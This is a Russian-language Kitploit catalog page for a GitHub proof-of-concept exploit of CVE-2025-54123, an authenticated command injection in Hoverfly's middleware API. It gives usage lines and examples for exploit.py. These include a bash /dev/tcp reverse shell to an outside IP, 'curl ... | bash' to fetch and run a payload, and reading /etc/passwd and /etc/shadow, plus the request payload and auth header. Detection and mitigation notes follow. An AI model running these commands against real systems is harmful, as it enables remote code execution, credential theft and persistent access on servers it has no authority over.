Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-54123-Poc — CVE-2025-54123 Hoverfly Аутентифицированное внедрение команд в Middleware (RCE) | Kitploit
Инструменты/GitHubGitHub/kasem545/cve-2025-54123-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubkasem545/cve-2025-54123-poc

CVE-2025-54123-Poc

CVE-2025-54123 Hoverfly Аутентифицированное внедрение команд в Middleware (RCE)

Репозиторий
74 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-54123 Эксплойт

Hoverfly Аутентифицированное внедрение команд в middleware RCE | CVSS 9.8 КРИТИЧЕСКИЙ

Уязвимость

Hoverfly <= 1.11.3 уязвим к аутентифицированному внедрению команд через конечную точку /api/v2/hoverfly/middleware. Требуются учетные данные администратора, но после аутентификации функциональность middleware принимает предоставленные пользователем значения бинарного файла и скрипта без проверки, что позволяет выполнять произвольные команды.

Цепочка уязвимости

  1. Недостаточная проверка ввода - middleware.go принимает произвольные пути к бинарным файлам
  2. Небезопасное выполнение команд - local_middleware.go напрямую передает пользовательский ввод в exec.Command()
  3. Немедленное выполнение - hoverfly_service.go выполняет middleware во время проверки

Требования

  • Действительные учетные данные администратора Hoverfly (имя пользователя/пароль)
  • Доступ к Admin API Hoverfly (порт по умолчанию 8888)

Использование

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> -c <COMMAND> [--shell SHELL]
  • -t, --target - конечная точка Hoverfly API (обязательно)
  • -u, --username - имя пользователя администратора (обязательно)
  • -p, --password - пароль администратора (обязательно)
  • -c, --command - команда для выполнения (обязательно)
  • --shell - бинарный файл оболочки для использования (по умолчанию: /bin/bash)

Примеры

root@kitploit:~
# Basic command execution
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami

# Read sensitive files
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"

# Reverse shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

# Multi-command execution
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"

# Use different shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh

# Download and execute payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"

Схема атаки

  1. Злоумышленник проходит аутентификацию с действительными учетными данными администратора (Basic Auth)
  2. Отправляет PUT-запрос на /api/v2/hoverfly/middleware с вредоносной нагрузкой
  3. Hoverfly записывает скрипт во временный файл /tmp/hoverfly_<random>
  4. Во время проверки выполняет: <shell> /tmp/hoverfly_<random>
  5. Вывод команды возвращается в разделе STDOUT ответа об ошибке
  6. Эксплойт извлекает и отображает вывод

Структура нагрузки

root@kitploit:~
{
    "binary": "/bin/bash",
    "script": "whoami"
}

HTTP-заголовки включают:

root@kitploit:~
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json

Воздействие

  • Полное удаленное выполнение кода с привилегиями процесса Hoverfly
  • Кража учетных данных - хищение ключей API, токенов, секретов
  • Перемещение по внутренней сети - компрометация соседних систем
  • Эксфильтрация данных - доступ к данным моделирования, конфигурациям
  • Постоянство - установка бэкдоров, поддержание доступа
  • Сбой в обслуживании - изменение/удаление конфигураций middleware

Уязвимые места кода

  • core/middleware/middleware.go:94-96 - No input validation on binary parameter
  • core/middleware/local_middleware.go:14-19 - Unsafe exec.Command() usage
  • core/hoverfly_service.go:173 - Immediate execution during validation

Затронутые версии

  • Hoverfly <= 1.11.3
  • Все установки с доступным Admin API и включенной аутентификацией

Обнаружение

Ищите:

  • PUT-запросы к /api/v2/hoverfly/middleware
  • Ответы об ошибках, содержащие "STDOUT:" с выводом команды
  • Временные файлы в /tmp/hoverfly/
  • Необычные выполнения процессов от службы hoverfly

Смягчение

  • Обновитесь до исправленной версии (если доступна)
  • Ограничьте доступ к Admin API только доверенными IP-адресами
  • Используйте надежные учетные данные для аутентификации
  • Мониторинг доступа к конечной точке /api/v2/hoverfly/middleware
  • Внедрите проверку ввода для параметров binary/script

Ссылки

  • CVE-2025-54123
  • CWE-78 (OS Command Injection)
  • CWE-20 (Improper Input Validation)
  • GHSA-r4h8-hfp2-ggmf
  • https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  • https://nvd.nist.gov/vuln/detail/CVE-2025-54123

Авторы

Первоначальное обнаружение: @Kr1shna4garwal

Скачать инструмент